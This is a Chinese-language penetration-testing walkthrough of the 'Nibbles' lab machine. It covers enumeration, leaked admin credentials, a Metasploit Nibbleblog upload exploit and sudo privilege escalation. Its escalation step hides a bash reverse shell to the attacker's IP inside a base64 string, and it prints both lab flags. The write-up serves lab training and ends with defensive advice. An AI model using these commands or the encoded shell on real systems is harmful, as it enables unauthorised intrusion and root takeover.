[Meachines] [Easy] nibbles Nibbleblog-Upload
字数 789 2025-08-20 18:18:23
Nibbleblog 渗透测试教学文档
1. 信息收集阶段
1.1 初始扫描
目标IP: 10.10.10.75
开放端口:
- 22/tcp (SSH) - OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
- 80/tcp (HTTP) - Apache httpd 2.4.18 (Ubuntu)
Nmap扫描命令:
nmap -p- 10.10.10.75 --min-rate 1000 -sC -sV
1.2 Web服务枚举
发现网站根目录没有有用信息:
curl http://10.10.10.75
使用Gobuster进行目录扫描:
gobuster dir -u "http://10.10.10.75/nibbleblog" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50
发现关键路径:
/nibbleblog/update.php/nibbleblog/content/private/users.xml
2. 漏洞利用
2.1 识别漏洞
使用searchsploit查找Nibbleblog漏洞:
searchsploit Nibbleblog
发现可利用的漏洞:
exploit/multi/http/nibbleblog_file_upload
2.2 获取凭据
在/nibbleblog/content/private/users.xml中找到管理员凭据:
username: admin
password: nibbles
2.3 使用Metasploit利用漏洞
Metasploit配置:
use exploit/multi/http/nibbleblog_file_upload
set LHOST 10.10.16.14
set PASSWORD nibbles
set USERNAME admin
set TARGETURI /nibbleblog
run
3. 后渗透阶段
3.1 获取用户权限
找到user flag:
895e7888ead0ee3699b05fcd82ae8a4e
3.2 权限提升
检查sudo权限:
sudo -l
创建提权脚本:
mkdir -p /home/nibbler/personal/stuff
echo 'L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE0LzEwMDM1IDA+JjEiCg=='|base64 -d >/home/nibbler/personal/stuff/monitor.sh
chmod +x /home/nibbler/personal/stuff/monitor.sh
执行提权:
sudo /home/nibbler/personal/stuff/monitor.sh
获取root flag:
c7d95df1cb6437197c6ae40bcce2bdc5
4. 技术要点总结
- 目录枚举:使用Gobuster发现隐藏的Nibbleblog目录是关键突破口
- 敏感文件泄露:
users.xml文件泄露了管理员凭据 - 已知漏洞利用:Nibbleblog的文件上传漏洞可通过Metasploit利用
- 权限提升:通过sudo权限执行自定义脚本实现提权
- Base64编码:提权脚本使用Base64编码绕过可能的检测
5. 防御建议
- 限制敏感文件访问权限
- 及时更新CMS系统
- 限制sudo权限范围
- 监控文件上传功能
- 实施最小权限原则